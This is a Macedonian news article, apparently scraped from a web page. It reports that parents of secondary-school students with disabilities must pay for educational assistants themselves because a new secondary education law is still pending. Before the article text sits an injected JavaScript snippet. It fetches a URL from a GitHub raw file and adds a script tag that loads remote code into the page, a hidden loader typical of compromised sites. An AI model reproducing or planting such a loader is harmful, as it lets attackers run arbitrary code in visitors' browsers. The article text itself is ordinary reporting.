;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Наместо државата, родителите сами ќе ги плаќаат образованите асистенти за средношколците со попреченост - Антропол
АктуелноЛокално

Наместо државата, родителите сами ќе ги плаќаат образованите асистенти за средношколците со попреченост

Средношколците со атипичен развој кои се школуваат во редовни училишта и оваа учебна година извисија и остнаа без образовни асистенти. Новиот Закон за средно образование, кој во делот на инклузијата предвидува учениците со попречености да добиваат образовни асистенти на сметка на државата, сè уште е во процедура и неколку години никако да се донесе. Добар дел од овие ученици, иако започна учебната година, а средното образование е задолжително, сè уште не тргнаа на школо. Немаат асистенција да стигнат до таму, да се вратат назад, помош за време на наставата. Останува на родителите кои сакаат децата да им одат во школо самите да си обезбедат образовен асистент и да го платат.

„На децата со атипичен развој Законот не им овозможува да имаат образовен асистент, односно државата не е надлежна во моментот да им го обезбеди тоа. Се сведува на тоа кој има пари ќе плати, а кој не дома ќе му седи детето. Има еден мал одреден број на асистенти што ги доделуваат општините, но тоа е лимитиран број и тие им плаќаат по 9.000 денари и ретко кој се јавува на тие огласи. И за тие што ќе се јават потоа родителите доплаќаат, зашто никој за таа сума нема да го работи овој ангажман“, вели Домника Кардула, родител на дете со аутизам.

„Бидејќи немаше асистенти одлучивме нашето дете да го запишеме во специјално училиште за рехабилитација и образование. За тие инстутуции не се даваат асистенти зашто кадарот таму е обучен, па за време на часовите нема потреба, со тоа и се сложуваме. Но, им треба личен асистент зашто тие не се способни сами да одат и да се враќаат во училиште, а и таму на часовите ако нешто им притреба. Моравме сами да дадеме оглас за личен асистент кој сами ќе го плаќаме“, додава Кардула.

Родителите воедно прашуваат како учениците со попречености во средно училиште ќе одат и на ескурзии и на други воннаставни активности без асистенти? Дали родителите мора да се откажат од работа за да ги носат и враќаат децата од школо?

Од Министерството за образование одговорија дека Законот за средно образование кој ќе го реши проблемот е во процедура, но нема прецизен рок кога ќе биде донесен.

„Со новиот Закон услугата ќе се воведе и во средните училишта, а во меѓувреме за оваа цел образовни асистенти за средношколци во општински средни училишта се ангажираат преку програма за општинско корисна работа, склучена помеѓу општините, Град Скопје, МОН, МТСП и УНДП како финансиер. Родителите на учениците се обраќаат до самото училиште за обезбедување на образовен асистент“, одговорија од МОН.

Неколку општини во државата во август годинава објавија јавни повици за ангажирање на образовнаи асистенти за средните училишта за учебната 2022/2023 за период од девет месеци и за паричен бруто надомест од 9.000 денари. Најчесто огласите се за вклучување на десетина асистенти по општина, што е премалку. Тие се ангажираат преку договор за соработка со Агенцијата за вработување, УНДП и програма за општо корисна работа. Засега нема официјален податок од институциите колку образовани асистенти се потребни за средното образование во државата.

За првпат лани со новиот Закон за основно образование учениците добија образовни асистенти на товар на државата, претходно ги плаќаа родителите. Ваквата позитивна пракса ќе продолжи и годинава.

„Со новиот Закон за основно образование, услугата образовна асистенција повеќе не е на товар на семејствата на учениците со попреченост, туку обврска на државата. Минатата година беа ангажирани 500 образовни асистенти, додека од септември ќе бидат ангажирани 720, согласно искажаните потреби на родителите/старателите на овие ученици во основните училишта“, соопштија од МОН.

Текстот е превземен од sdk.mk